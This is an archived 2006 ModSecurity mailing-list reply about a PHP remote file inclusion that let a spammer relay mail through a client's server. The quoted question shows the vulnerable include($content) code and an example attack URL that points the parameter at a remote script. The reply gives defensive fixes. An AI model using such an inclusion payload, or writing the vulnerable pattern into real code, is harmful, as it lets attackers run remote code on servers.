[Modsecurity] Spam injection, very sneeky
Michal Wallace
michal at sabren.com
Fri Oct 13 17:11:47 EDT 2006
On Fri, 13 Oct 2006, MIKE YRABEDRA wrote:
> I have been using modsec to block all sorts of spam injection, but I have
> found a new one.
>
> I have a client that has a blanket style pages that includes anyhting sent
> to it. Like so...
>
> <? include($content); ?>
>
> So if someone does this...
>
> http://www.somesite.com/folder/index.php?content=http://home.arcor.de/dumpxp
> l/mail.php?
>
> ..bad things happen. In my case over 100k of spam being relayed by my
> server.
>
> I caught this guy using modsec and searching ARGS with the same text as in
> the spam. This is OK for now, until he uses a different spam.
>
>
> The php script that did the damage can be seen here...
> http://home.arcor.de/dumpxpl/mail.php
>
> Is there a modsec rule that will prevent this sort of thing?
Hey Mike,
PHP's remote include "feature" is wrong
on so many levels. One thing you can do in
this case is have the client sanitize the
$content variable so it doesn't do this.
There's usually no reason it has to have
the http:// in there, and if there is,
you can limit it to the sites he actually
wants to use.
Or he could just fetch the url and print
the contents, rather than using include().
Or you could patch PHP so it doesn't let
this happen:
http://www.hardened-php.net/
At the very least, you should scan for
http:// in the args. I'm surprised the gotroot
rules didn't catch this. I'm pretty sure
there was a rule that did this already for
any php file.
Sincerely,
Michal J Wallace
Sabren Enterprises, Inc.
-------------------------------------
contact: michal at sabren.com
hosting: http://www.cornerhost.com/
my site: http://www.withoutane.com/
-------------------------------------
More information about the Modsecurity
mailing list